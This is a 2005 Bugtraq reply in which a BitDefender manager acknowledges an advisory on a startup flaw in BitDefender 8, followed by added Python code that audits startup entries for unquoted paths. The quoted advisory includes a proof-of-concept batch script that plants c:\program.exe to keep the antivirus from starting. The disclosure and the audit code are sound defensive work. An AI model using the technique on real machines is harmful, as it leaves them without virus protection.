[38578] in bugtraq
Re: BitDefender 8 - Race condition vulnerability
daemon@ATHENA.MIT.EDU (Ovidiu Constantin)
Mon Apr 25 16:05:08 2005
From: Ovidiu Constantin <oconstantin@bitdefender.com>
To: bugtraq@securityfocus.com, SecuBox fRoGGz <unsecure@writeme.com>
In-Reply-To: <20050423030310.19443.qmail@www.securityfocus.com>
Date: Mon, 25 Apr 2005 17:47:16 +0300
Message-Id: <1114440437.10058.2.camel@localhost.localdomain>
On Sat, 23-04-2005 at 03:03 +0000, SecuBox fRoGGz wrote:
>
> -----------------------------
> Product: BitDefender
> Version: 8
> Tested on: Windows 2000 SP4
> Vulnerability: Race condition
> -----------------------------
>
> BACKGROUND
> ----------
> BitDefender ensures the most advanced antivirus protection, as well as data
> confidentiality, active content control and Internet filtering.
> A powerful antivirus tool with features that best meet your security needs.
> Source: www.bitdefender.com
>
>
> VULNERABLE PRODUCTS
> -------------------
> BitDefender 8 Professional Plus
> BitDefender 8 Standard Edition
> Maybe others...
>
>
> RACE CONDITION
> --------------
> At Windows startup, when a file named program.exe is found on c:\,
> Windows sends an alert message. The message box controls are:
> 2 buttons -> "Rename" or "Ignore"
> 1 checkbox -> [X] Do not do this verification on startup.
> (Sorry, haven't got the exact English message)
>
> At this moment, BitDefender can't start, so we have a session without virus protection.
>
>
> PROOF OF CONCEPT
> ----------------
> Open your notepad.exe and paste this batch script.
>
> @echo off
> echo #-------------------------------------------------------#
> echo [ SecuBox - Proof of Concept (04.12.2005) ]
> echo #-------------------------------------------------------#
> echo # This script just creates the race condition. #
> echo # It might be used by a virus. #
> echo # Now, reboot your computer and watch your BitDef ! #
> echo #-------------------------------------------------------#
> echo # Be careful, virus protection needs another reboot #
> echo # Closing your Windows session is not sufficient ! #
> echo #-------------------------------------------------------#
> echo BitDef PoC > c:\program.exe
> pause
> exit
>
>
> EXPLOITATION
> ------------
> Save this batch script as TEST.BAT and try it.
>
>
> VENDOR STATUS
> -------------
> Vendor has been contacted but no reply ...
>
>
> CREDITS
> ----------------------
> SecuBox Labs - fRoGGz
> unsecure@writeme.com
> ----------------------
Thanks for informing us about this issue. Now we are aware of it and in a
short time all BitDefender installation kits will be updated in order
to fix it. The quick fix is to put all the start-up commands between " ".
We will keep you posted.
--
Ovidiu Constantin - PGP/GPG Key ID 0xBF7F01FF
BitDefender Linux/Unices Testing Project Manager
SOFTWIN / Data Security Division / BitDefender
http://linux.bitdefender.com/
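The vendor's quick fix works because Windows resolves an unquoted command line by trying it cut at each space, so for anything installed under C:\Program Files the first candidate is c:\program.exe, which is exactly the file the advisory plants. The following is an added example, not code from the advisory or from BitDefender, that audits startup entries for this ambiguity and emits the quoted form; the entry names and paths are constructed, and the ".exe" boundary used to find the program is a heuristic.

```python
import re

# Constructed sample startup (Run-key style) entries; not BitDefender's real paths.
SAMPLE_STARTUP = {
    "Hypothetical AV": r"C:\Program Files\Example AV\monitor.exe /start",
    "Quoted tool": r'"C:\Program Files\Example Tool\tool.exe" /quiet',
    "No spaces": r"C:\Tools\agent.exe",
}

# Heuristic: the program is everything up to the first ".exe" token boundary.
EXE_RE = re.compile(r"^(.*?\.exe)(\s.*)?$", re.IGNORECASE | re.DOTALL)

def split_command(cmdline):
    """Split a startup command into (program path, arguments)."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):                 # quoted: unambiguous
        end = cmdline.index('"', 1)
        return cmdline[1:end], cmdline[end + 1:].strip()
    m = EXE_RE.match(cmdline)
    if not m:
        raise ValueError(f"cannot locate program in {cmdline!r}")
    return m.group(1), (m.group(2) or "").strip()

def candidate_modules(path):
    """Module names CreateProcess tries, in order, for an unquoted path: the path
    cut at each space (.exe appended when the cut has no extension), then the full path."""
    cands = []
    for i, ch in enumerate(path):
        if ch == " ":
            head = path[:i]
            cands.append(head if "." in head.rsplit("\\", 1)[-1] else head + ".exe")
    cands.append(path)
    return cands

def quote_command(cmdline):
    """The vendor's quick fix: wrap the program path in double quotes."""
    path, args = split_command(cmdline)
    return f'"{path}"' + (f" {args}" if args else "")

def audit(entries):
    """Map entry name -> paths that would be probed before the real program; empty means nothing to fix."""
    findings = {}
    for name, cmd in entries.items():
        if cmd.lstrip().startswith('"'):
            continue
        cands = candidate_modules(split_command(cmd)[0])
        if len(cands) > 1:
            findings[name] = cands[:-1]
    return findings
```

Running audit(SAMPLE_STARTUP) flags only the unquoted entry under C:\Program Files, and quote_command gives the form the vendor describes.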